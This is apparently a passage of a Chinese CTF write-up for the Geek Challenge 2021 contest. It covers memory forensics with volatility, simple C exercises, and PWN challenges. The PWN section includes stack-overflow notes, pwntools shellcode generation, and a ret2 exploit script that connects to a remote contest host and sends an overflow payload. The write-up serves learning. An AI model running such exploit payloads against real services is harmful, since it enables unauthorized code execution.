<p>当查到最后一个文件时，突然找到了我们想要的地址：rigelx.top</p>
<p><img src="/Geek2021/image-20211114134318912.png"></p>
<p>我们按hints第二步，寻找下载文件volatility -f SSSSSSSSS.raw –profile&#x3D;Win7SP1x64 filescan | grep -i download</p>
<p><img src="/Geek2021/image-20211114140353745.png"></p>
<p>dat肯定不对，所以推测是L0v3r.f,标准奇怪！</p>
<p>第三个hint：查阅资料发现方法</p>
<p><img src="/Geek2021/image-20211114151438067.png">我们要找到用户名，首先要查注册表volatility -f SSSSSSSSS.raw –profile&#x3D;Win7SP1x64 hivelist</p>
<p><img src="/Geek2021/image-20211114145611392.png"></p>
<p>那么其中0x8bc1a1c0是相当于本题中\REGISTRY\MACHINE\SYSTEM的地址即0xfffff8a000024010</p>
<p><img src="/Geek2021/image-20211114151804489.png"></p>
<p>找到用户名P0TT3R</p>
<p>SAM：0xfffff8a000e36010</p>
<p>system：0xfffff8a000024010</p>
<p>0x000000007ebb0070      1      1 RW-rw- \Device\HarddiskVolume3\P0TT3R-20211009-044021.raw</p>
<p>暴毙，找不到密码，用哈希也没用，很难受。</p>
<h3 id="20-三叶草聚会"><a href="#20-三叶草聚会" class="headerlink" title="20.三叶草聚会"></a>20.<strong>三叶草聚会</strong></h3><p>给了一个hint，用记事本打开</p>
<p><img src="/Geek2021/image-20211115191133868.png"></p>
<p>满屏的好像是base64加密，要么换图片，要么换文字，但根据提示应该是需要ssh来搞，但是确实没时间了，日后会研究一下ssh的操作。</p>
<h3 id="21ezA-B"><a href="#21ezA-B" class="headerlink" title="21ezA+B"></a>21ezA+B</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">long</span> A,B,sum;</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%ld %ld&quot;</span>,&amp;A,&amp;B);</span><br><span class="line">    sum=A+B;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%ld&quot;</span>,sum);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h3 id="22烧饼"><a href="#22烧饼" class="headerlink" title="22烧饼"></a>22烧饼</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">int</span> x;</span><br><span class="line">	<span class="type">double</span> ans;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;x);</span><br><span class="line">	ans=x*<span class="number">2.7453</span>;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%.2lf&quot;</span>,ans);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h3 id="23出勤"><a href="#23出勤" class="headerlink" title="23出勤"></a>23出勤</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">int</span> n;</span><br><span class="line">	<span class="type">double</span> m;</span><br><span class="line">	<span class="type">int</span> i=<span class="number">0</span>;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;n);</span><br><span class="line">	<span class="keyword">if</span>(n&gt;=<span class="number">0</span>&amp;&amp;n&lt;=<span class="number">50</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		m=n;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> <span class="keyword">if</span>(n&gt;=<span class="number">50</span>&amp;&amp;n&lt;=<span class="number">100</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		m=<span class="number">50</span>+(n<span class="number">-50</span>)*<span class="number">0.7</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		m=<span class="number">50</span>+<span class="number">50</span>*<span class="number">0.7</span>+(n<span class="number">-100</span>)*<span class="number">0.5</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	i=(<span class="type">int</span>)m/<span class="number">50</span>;</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%.1f %d&quot;</span>,m,i);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>



<h3 id="24美国人"><a href="#24美国人" class="headerlink" title="24美国人"></a>24美国人</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">int</span> a,b,c,d;</span><br><span class="line">	<span class="type">int</span> x,y;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d %d %d %d&quot;</span>,&amp;a,&amp;b,&amp;c,&amp;d);</span><br><span class="line">	x=c-a;</span><br><span class="line">	y=d-b;</span><br><span class="line">	<span class="keyword">if</span>(a==c&amp;&amp;b==d)</span><br><span class="line">	&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;24 0&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;&#125;</span><br><span class="line">	<span class="keyword">if</span>(y&lt;<span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		x--;</span><br><span class="line">		y=<span class="number">60</span>+y;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(x&lt;<span class="number">0</span>) x=<span class="number">24</span>+x;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%d %d&quot;</span>,x,y);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="25五则运算"><a href="#25五则运算" class="headerlink" title="25五则运算"></a>25五则运算</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">int</span> a,b;</span><br><span class="line">	<span class="type">char</span> c;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d%c%d&quot;</span>,&amp;a,&amp;c,&amp;b);</span><br><span class="line">	<span class="keyword">switch</span>(c)                                      </span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">case</span> <span class="string">&#x27;+&#x27;</span>:</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,a+b);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		<span class="keyword">case</span> <span class="string">&#x27;-&#x27;</span>:</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,a-b);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		<span class="keyword">case</span> <span class="string">&#x27;*&#x27;</span>:</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,a*b);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		<span class="keyword">case</span> <span class="string">&#x27;/&#x27;</span>:</span><br><span class="line">			<span class="keyword">if</span>(b!=<span class="number">0</span>)</span><br><span class="line">			&#123;</span><br><span class="line">			    <span class="keyword">if</span>(a/b&lt;(<span class="type">double</span>)a/b) </span><br><span class="line">			    &#123;<span class="built_in">printf</span>(<span class="string">&quot;%.2f&quot;</span>,(<span class="type">double</span>)a/b);</span><br><span class="line">				<span class="keyword">break</span>;&#125;</span><br><span class="line">				<span class="keyword">else</span></span><br><span class="line">				&#123;</span><br><span class="line">				    <span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,a/b);</span><br><span class="line">				    <span class="keyword">break</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">else</span>&#123;</span><br><span class="line">				<span class="built_in">printf</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">				<span class="keyword">break</span>;&#125;</span><br><span class="line">		<span class="keyword">case</span> <span class="string">&#x27;%&#x27;</span>:</span><br><span class="line">		    <span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,a%b);</span><br><span class="line">		    <span class="keyword">break</span>;</span><br><span class="line">		<span class="keyword">default</span> :</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>超时了我不理解！</p>
<h2 id="26平均值"><a href="#26平均值" class="headerlink" title="26平均值"></a>26平均值</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">int</span> a;</span><br><span class="line">	<span class="type">long</span> <span class="type">long</span> b=<span class="number">0</span>;</span><br><span class="line">	<span class="type">int</span> t=<span class="number">0</span>;</span><br><span class="line">	<span class="type">double</span> s;</span><br><span class="line">	<span class="keyword">while</span>(<span class="number">1</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>,&amp;a);</span><br><span class="line">		<span class="keyword">if</span>(a==<span class="number">-1</span>)<span class="keyword">break</span>;</span><br><span class="line">		b+=a;</span><br><span class="line">		t++;</span><br><span class="line">	&#125;</span><br><span class="line">	s=(<span class="type">double</span>)b/t;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%.2lf&quot;</span>,s);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>MISC总结：刚开始什么都不会写，但经过我在csdn上翻别的师傅写的各种题型，还是对这些题有了一定的感觉吧，很好玩，做出来令人激动，但我把洛谷忘了，只剩四个小时的时候才开始写，算是有点遗憾吧，其中取证这个题是我觉得最难受的，只差一个密码，直到14号将近结束我还在找密码，意难平！！</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="27-check-in"><a href="#27-check-in" class="headerlink" title="27.check in"></a>27.<strong>check in</strong></h3><p>简单写一下pwn常用的知识点总结：</p>
<p>gdb file<br>先设断点b main——》找到地址，或者b 地址<br>run&#x2F;r是运行<br>s是步入<br>n是步过<br>ebp是上一个函数的栈底<br>esp是栈顶，但esp在栈的底部，因为在栈中地址由高到低<br>stack 24，可看24个stack<br>比ebp高一位的就是返回地址<br>把ebp return的数据返回到shell就是攻击，所以要找eax和ebp之间的位数<br>io.remote(“xxxxx”,xxx)远程启动本地程序<br>io&#x3D;process（“.&#x2F;file”)就是启动进程<br>io.recvline()显示一行输出的字符串<br>io.recv()是把字符串全输出<br>payload&#x3D;b’A’*位数+b’B’*4字节+p64（sh地址）<br>io.sendline(payload)向机器发送指令<br>io.interactive()进入交互模式——》拿下控制权<br>其中pwd是显示地址，ls显示文件夹目录下文件<br>可用python脚本攻击，vim file<br>然后python3 file。<br>但shellcode一般写在栈和bss区，但栈有保护措施即NX保护<br>ALSR保护：随即地址，0不随机，1半随机，栈每次都不同，2全随机即内存也随机<br>PIE保护随机化elf文件映像，bss，txt，data即转存到内存的<br>pwntools中shellcode的输出<br>context.arch&#x3D;”amd64”<br>shellcraft.amd64.sh()——》若无shellcode入口则采用此方法<br>print（shellcraft.amd64.sh()）——》输出shellcode的汇编码<br>asm（shellcraft.amd64.sh()）——》变成机械码<br>chardet可判断字符串是utf8还是ascii<br>import chardet<br>chardet.detect(b”abc123”)</p>
<p><img src="/Geek2021/image-20211116164621695.png"></p>
<p><img src="/Geek2021/image-20211116164652815.png"></p>
<p>简单说一下：setvbuf是为了不让系统卡顿，用alarm来限制时间，然后就照着运算即可。</p>
<p>该题是在规定时间内计算四则运算，手算显然不行，因为我手算了4个就暴毙了。我服了，我的wp不见了，就剩两张张图片了，但应该没问题，我是参照去年极客的写的脚本</p>
<p><img src="/Geek2021/image-20211116201854819.png"></p>
<p>我们要做的就是利用脚本将num1和num2提取出来，相加发送回去。</p>
<p>但定义四个函数太拉了，我们的目标不过是提取num1和num2，稍微改了一下。</p>
<p><img src="/Geek2021/image-20211117182828120.png"></p>
<p>这样就可以pwn掉了！</p>
<h3 id="28-恋爱小游戏"><a href="#28-恋爱小游戏" class="headerlink" title="28.恋爱小游戏"></a>28.<strong>恋爱小游戏</strong></h3><p><img src="/Geek2021/image-20211115161502955.png"></p>
<p>第一道pwn题目诞生了；</p>
<p><img src="/Geek2021/image-20211115161509482.png"></p>
<p>先gbd一下有什么保护</p>
<p><img src="/Geek2021/image-20211115161536782.png"></p>
<p>接下来设断点b main，找到断点，然后r。</p>
<p><img src="/Geek2021/image-20211115161549587.png"></p>
<p>一直nnnnnnnn，找到入口read函数，s单步进入</p>
<p><img src="/Geek2021/image-20211115161610268.png"></p>
<p><img src="/Geek2021/image-20211115161620454.png"></p>
<p>一直s，直到让输入字符，因为buf数组24，输入24个垃圾字符，a*24</p>
<p><img src="/Geek2021/image-20211115161630664.png"></p>
<p>看rsp，rbp地址的差就是我们所需，0xfffffffdfb0-0xfffffffdf90&#x3D;32,记得gdb中是越往下地址越高。</p>
<p>再查看我们要跳转的system的地址：</p>
<p><img src="/Geek2021/image-20211115161646838.png"></p>
<p>所以可以进行交互了，代码如下，其中我们发现有一串乱码，经查阅这是py3的小问题，我们可以通过：</p>
<p>查看乱码是什么编码<br>import chardet<br>response &#x3D; chardet.detect(b’\xe5\xbd\x93\xe5\x89\x8d\xe7\x9b\xae\xe5\xbd\x95\xe4\xb8\x8b\xe6\x89\x80\xe6\x9c\x89\xe6\x96\x87\xe4\xbb\xb6\xe5\x90\x8d\xe6\xb1\x87\xe6\x80\xbb\xe5\x88\x97\xe8\xa1\xa8’)<br>print(response)</p>
<p>进行转换</p>
<p><img src="/Geek2021/image-20211115161711605.png"></p>
<p>当我输入cat flag.txt</p>
<p>得到flag；</p>
<p>flag{7536ddd9-5e99-4606-94cf-1e65dae937e1}</p>
<h3 id="29-恋爱小游戏2"><a href="#29-恋爱小游戏2" class="headerlink" title="29.恋爱小游戏2"></a>29.<strong>恋爱小游戏2</strong></h3><p>写本题是学到的pwn：</p>
<p>vim file用来创建可写语言，<br>gcc file用来读所写内容，当然可以读elf，如输完gcc file后，ls，显示a.out，再cat，显示机械码。<br>ls为所属文件下的文件名<br>局部变量存在栈（stack）中，<br>heap可存字符串<br>内存中got存储偏移量<br>未初始化全局变量被存在内存中的bss中，且不占用磁盘空间，但占用内存空间。<br>像main函数，字符串等内容被存在text之中。<br>（有顺序）<br>大端序：低地址在高位<br>小端序：低地址在低位（常用）<br>硬件只能与硬件联系<br>靠近cpu的存储器价格高，重要，速度慢<br>内存（memory）断电不保存所以需要外存。<br>cpu的寄存器作用是存放正在运行cpu的数据<br>read函数会读取我们在屏幕上输入的内容，但不会检查内容的多少，全部复制到str里，但str只能存取20个，如果超出这个值，会造成溢出</p>
<p>打开ida发先与之前不一样必须等与loveyou才能到binsh</p>
<p><img src="/Geek2021/image-20211115161821206.png"></p>
<p>之后拉到linux，先checksec然后再gdb发现与之前一样，此时可确定要填32个垃圾值，其中要包括loveyou，但是这样不行，经过网上查阅，发现输入字符串后面必须要给\0一位，所以就有如图</p>
<p><img src="/Geek2021/image-20211115161904038.png"></p>
<p>或者payload&#x3D;b’loveyou’+rjust(0x20, b’A’)</p>
<p>那么rjust函数作用：str.rjust(width[, fillchar])，</p>
<ul>
<li>width – 指定填充指定字符后中字符串的总长度.</li>
<li>fillchar – 填充的字符，默认为空格。</li>
</ul>
<p>而且要填充到字符串最左侧！！</p>
<h3 id="30-ret2xxone"><a href="#30-ret2xxone" class="headerlink" title="30.ret2xxone"></a>30.<strong>ret2xxone</strong></h3><p>一些学pwn的汇编知识：</p>
<p>int sprintf(v8（char *buffer）, const char *format, v4[argument]…）) ,功能是将v4转为16进制再赋值给V8<br>strcat(v10,v4):v4接在v10后面<br>format：格式化字符串，即在程序中想要的格式<br>jnz结果不为零（或不相等）则转移。</p>
<p>jz即零标志为1就跳转。</p>
<p>JNZ(或JNE)(jump if not zero, or not equal)，汇编语言中的条件转移指令。结果不为零(或不相等)则转移。</p>
<p>测试条件：ZF&#x3D;0</p>
<p>ZF汇编语言中的PSW标志寄存器中的一位，而JZ则是根据ZF决定是否跳转。若ZF&#x3D;1(表示本次运算结果为0，不为0则ZF&#x3D;0)，则跳转，否则，不跳转ZF的状态根据其他指令的执行结果设置。</p>
<p>jz&#x3D;jump if zero，即零标志为1就跳转，一般与cmp连用，用以判断两数是否相等。jz的另一种写法就是je，je&#x3D;jump if equal，jz和je的作用是完全一样的。</p>
<p>JZ是累加器A判零条件转移指令。<br>int 3是一个软件断点中断，一般用于调试时设置断点，用于观察，查找一些软件的关键数据，你可以任意修改断点。<br>介绍ida中汇编前的代码含意：<br>1.load与头文件有关<br>2.init代码段<br>3.plt代码段<br>4.text代码段<br>5.got节gotplt节：记录八字节地址<br>6.data是数据段</p>
<p>got可以找到函数真正地址<br>dissass+地址——》反汇编<br>info b 查看断点<br>d +数字删除断点<br>c继续执行程序，断点多才有用，遇到下一断点停止<br>不小心点住s，步入函数后可用return直接离开<br>rodata中存在binsh</p>
<p>这个题是我做的最久，最意难平的一道题，我写的脚本没毛病，但就是要有一个，32位的环境，我配置环境已经单独为这个题配了两次了，还是不行，可能是我实力问题😚</p>
<p><img src="/Geek2021/image-20211115184308707.png"></p>
<p><img src="/Geek2021/image-20211115184319854.png"></p>
<p>从read函数栈溢出就行了</p>
<p>但用ldd指令出来引用的是libc32位的库，很难受，还是太菜了。</p>
<p>from pwn import*<br>from ctypes import*</p>
<p>io &#x3D;remote(“123.57.230.48”,12345)</p>
<p>libc&#x3D;cdll.LoadLibrary(‘libc.so.6’)</p>
<p>libc.srand()<br>io.recvuntil(“Try your best to solve it!\n”)<br>io.sendline(str(libc.rand()))<br>payload&#x3D;b’a’*(0x1a+0x4)+p32(0x080485E7)+p32(0x080486D0)<br>io.sendline(payload)<br>io.interactive()</p>
<p>PWN总结：很难，对基础要求很高，也要求对汇编和逆向有充分的了解，本人小白只浅尝辄止的学习了点皮毛，需要在逆向的基础上更加努力！</p>
<p>加油吧！慢慢更完！</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2021/12/12/ReverseCorePrinciple/" rel="next" title="ReverseCorePrinciple1">
      ReverseCorePrinciple1 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98WP"><span class="nav-text">第十二届极客大挑战WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-Dark"><span class="nav-text">1 Dark</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-WELCOME"><span class="nav-text">2 WELCOME</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-babySQL%E6%B3%A8%E5%85%A5"><span class="nav-text">3 babySQL注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4where-is-my-FUMO"><span class="nav-text">4where_is_my_FUMO</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5babyPOP"><span class="nav-text">5babyPOP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RE"><span class="nav-text">RE</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#uncompyle6-version-3-7-4"><span class="nav-text">uncompyle6 version 3.7.4</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Python-bytecode-3-8-3413"><span class="nav-text">Python bytecode 3.8 (3413)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Decompiled-from-Python-3-8-3-tags-x2F-v3-8-3-6f8c832-May-13-2020-22-37-02-MSC-v-1924-64-bit-AMD64"><span class="nav-text">Decompiled from: Python 3.8.3 (tags&#x2F;v3.8.3:6f8c832, May 13 2020, 22:37:02) [MSC v.1924 64 bit (AMD64)]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Embedded-file-name-easypyc-py"><span class="nav-text">Embedded file name: easypyc.py</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-new-language"><span class="nav-text">2.new_language</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Re0"><span class="nav-text">4.Re0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-Re1"><span class="nav-text">5.Re1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-win32"><span class="nav-text">6.win32</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-%E8%B0%83%E8%AF%95"><span class="nav-text">7.调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-Classical-music"><span class="nav-text">8.Classical music</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-%E4%B8%89%E4%B8%AA%E4%B9%9F%E5%8F%AF%E4%BB%A5"><span class="nav-text">9.三个也可以</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-Superposition-under-the-starry-sky"><span class="nav-text">10.Superposition under the starry sky</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-text"></span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-easy-house-of-Classic-Crypto"><span class="nav-text">11.easy house of Classic Crypto</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-Random"><span class="nav-text">12.Random</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-%E5%9C%A3%E5%98%89%E7%84%B6"><span class="nav-text">13.圣嘉然</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-%E8%AF%B4%E5%AE%9E%E8%AF%9D%E6%8C%BA%E5%A5%BD%E7%8E%A9%E7%9A%84%EF%BC%8C%E4%B8%8D%E6%98%AF%E5%90%97%EF%BC%9F"><span class="nav-text">14.说实话挺好玩的，不是吗？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-%E6%AF%8F%E6%97%A5%E4%B8%80%E6%BA%9C"><span class="nav-text">15.每日一溜</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-PANDORA-PARADOXXX"><span class="nav-text">16.PANDORA PARADOXXX</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17-SGA-Character"><span class="nav-text">17.SGA Character</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#18-%E4%BB%8A%E5%A4%A9%E6%9C%89%E8%A2%AB%E7%A0%B4%E9%98%B2%E5%90%97%EF%BC%9F"><span class="nav-text">18.今天有被破防吗？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#19-EzForensics"><span class="nav-text">19.EzForensics</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20-%E4%B8%89%E5%8F%B6%E8%8D%89%E8%81%9A%E4%BC%9A"><span class="nav-text">20.三叶草聚会</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#21ezA-B"><span class="nav-text">21ezA+B</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#22%E7%83%A7%E9%A5%BC"><span class="nav-text">22烧饼</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#23%E5%87%BA%E5%8B%A4"><span class="nav-text">23出勤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#24%E7%BE%8E%E5%9B%BD%E4%BA%BA"><span class="nav-text">24美国人</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#25%E4%BA%94%E5%88%99%E8%BF%90%E7%AE%97"><span class="nav-text">25五则运算</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#26%E5%B9%B3%E5%9D%87%E5%80%BC"><span class="nav-text">26平均值</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN"><span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#27-check-in"><span class="nav-text">27.check in</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#28-%E6%81%8B%E7%88%B1%E5%B0%8F%E6%B8%B8%E6%88%8F"><span class="nav-text">28.恋爱小游戏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#29-%E6%81%8B%E7%88%B1%E5%B0%8F%E6%B8%B8%E6%88%8F2"><span class="nav-text">29.恋爱小游戏2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" 